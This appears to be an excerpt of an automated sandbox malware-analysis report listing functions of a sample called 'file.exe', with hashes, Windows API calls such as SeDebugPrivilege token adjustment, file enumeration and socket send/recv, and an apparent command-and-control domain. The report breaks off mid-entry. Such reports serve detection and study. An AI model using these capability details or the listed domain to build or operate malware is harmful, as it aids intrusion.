Opcode ID: 55fc290fe076130ed8c35fa0d2ee729fa19789dee46c5f3b0116d9049257b756
Instruction ID: a63628ea9df8a5df6f5124cc4bf6b28e4a499e4381a0f88aca87c996bf7afe0f
Opcode Fuzzy Hash: 55fc290fe076130ed8c35fa0d2ee729fa19789dee46c5f3b0116d9049257b756
Instruction Fuzzy Hash: F12150755083849FCB03CF24D994B11BF71EB46614F28C5DAD8498F2A7C33A995ACB62

Function 0232D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1890602136.000000000232D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0232D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_232d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: ea258eb097d6c4ea621efb122339e23e259c508c48a77e5a466445d32928d2a7
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 9711E676504284CFDB16CF14D5C4B16BF72FB84328F34C6A9D8494B656C336D45ACBA1

Function 0233D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1890652749.000000000233D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0233D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_233d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 72637bc83f5ee547067ab1020168ddcd24a86fe4d0bb810d5f63ce88278976ed
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 1911DD75904284DFCB02CF10C5C4B15FBB2FB84324F24C6ADD8498B296C33AD50ACB61

Non-executed Functions

Function 06747660 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

z|>, xrefs: 067476BB

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID:
String ID: z|>
API String ID: 0-1134487427
Opcode ID: d9a26365c41f034c58eb4c7251dc471a049f7fb1827ee2bd6f82cf815dec615a
Instruction ID: 6ce01e3166fe49b6670c94953a24e79ed74a98e64f05e190e47c84da90a8d71b
Opcode Fuzzy Hash: d9a26365c41f034c58eb4c7251dc471a049f7fb1827ee2bd6f82cf815dec615a
Instruction Fuzzy Hash: 62E1F9B4E101198FCB54DFA9C5849AEFBF2FF89304F248169D814AB35AD731A941CFA1

Function 067456B0 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

Y>0, xrefs: 0674570B

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID:
String ID: Y>0
API String ID: 0-1250427286
Opcode ID: 8139ead8b6baae195b443f6613f284dbb1465a76e0f461749568fac447e931cd
Instruction ID: ffa99639a815a07d1bfe5b5d8950b9ea02e7df3de2659cc47d8cc88013261183
Opcode Fuzzy Hash: 8139ead8b6baae195b443f6613f284dbb1465a76e0f461749568fac447e931cd
Instruction Fuzzy Hash: 7DE1FBB4E101198FDB14DFA9C5949AEFBF2FF89304F248169D414AB35ADB31A941CF60

Function 06745AE8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

fo_N, xrefs: 06745B43

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID:
String ID: fo_N
API String ID: 0-3502626514
Opcode ID: 4a798d02df77ce26c84871779e9fadd2a004c9f4f2395298788fb6a4e817c023
Instruction ID: ad571c0399a0f2ce99774d1cfa2a2dd9adc602cbf07f39515a63fcaaa54632a3
Opcode Fuzzy Hash: 4a798d02df77ce26c84871779e9fadd2a004c9f4f2395298788fb6a4e817c023
Instruction Fuzzy Hash: F8E1FAB4E101199FDB14DFA9C5849AEFBF2FF89304F248169D414AB35ADB30A941CFA1

Function 04B10040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030d89efe3ac9505ba3e3ac6992e4a78f28003607d4ae6c2f162238a10506e39
Instruction ID: ee4f5b28dcf1265614f811c16c930e2db71632ffe742fdcdb7e1135e5b443a2c
Opcode Fuzzy Hash: 030d89efe3ac9505ba3e3ac6992e4a78f28003607d4ae6c2f162238a10506e39
Instruction Fuzzy Hash: A712C7B0CA17458BE318CF25EC4C18D3BF1BB81314BD28A0DCA616B2E5EBB4156ACF44

Function 06745F20 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: debe6411c356324331fdf1af956b4f88103e20b6e4800d728345cdd9658c66e1
Instruction ID: 583246b72799e5550ba2ec7e8f55eb744cdd28234f40afec369b4eb402005ebd
Opcode Fuzzy Hash: debe6411c356324331fdf1af956b4f88103e20b6e4800d728345cdd9658c66e1
Instruction Fuzzy Hash: B7E10C74E101198FDB14DFA9C5849AEFBF2FF89304F248169D415AB35ADB31A941CF60

Function 06745278 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899077496.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6740000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7cb2e70f6241312c3db23392138be1e0c6ca7150ddebde671484f6fa499e388
Instruction ID: 144bbc290e01b7abbba4773574f813eb45a84d3e2fe3c47968a660b0a10c83aa
Opcode Fuzzy Hash: e7cb2e70f6241312c3db23392138be1e0c6ca7150ddebde671484f6fa499e388
Instruction Fuzzy Hash: C9E109B4E101198FDB14DFA9C5849AEFBF2FF89305F248169D414AB35AD730A981CFA1

Function 0246D51C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1891083418.0000000002460000.00000040.00000800.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2460000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 216f9242cd788bd260b65df39b48b257d86d3bd1340aa8830cb7798c8dc19885
Instruction ID: 49c338b3be44019ecbba5b29638526679d85de7df60bc7d29ba98f4594fa4484
Opcode Fuzzy Hash: 216f9242cd788bd260b65df39b48b257d86d3bd1340aa8830cb7798c8dc19885
Instruction Fuzzy Hash: 7BA17E32E102098FCF15DFA5D8445EEB7B2FF85304B16856AE802AB661DB31ED5ACF40

Function 04B10006 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dacd2751bd68b2fc6c0c55021e3a6454955c003b495eaae4e98baeae62529ec
Instruction ID: 989097ceb30bfa10998c7e8c3c2c194da129504cf901519aef2ecf8e76de0043
Opcode Fuzzy Hash: 6dacd2751bd68b2fc6c0c55021e3a6454955c003b495eaae4e98baeae62529ec
Instruction Fuzzy Hash: F7C12AB0CA17468FD719CF25EC4C18D7BB1BB81324B928A0DD6616B2E5EBB4146ACF44

Analysis Process: file.exePID: 7716, Parent PID: 7524COMMON

Execution Graph

Execution Coverage:	31.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	94

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\*, xrefs: 00403D99
Program Files, xrefs: 00403E01
Windows, xrefs: 00403DEA
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

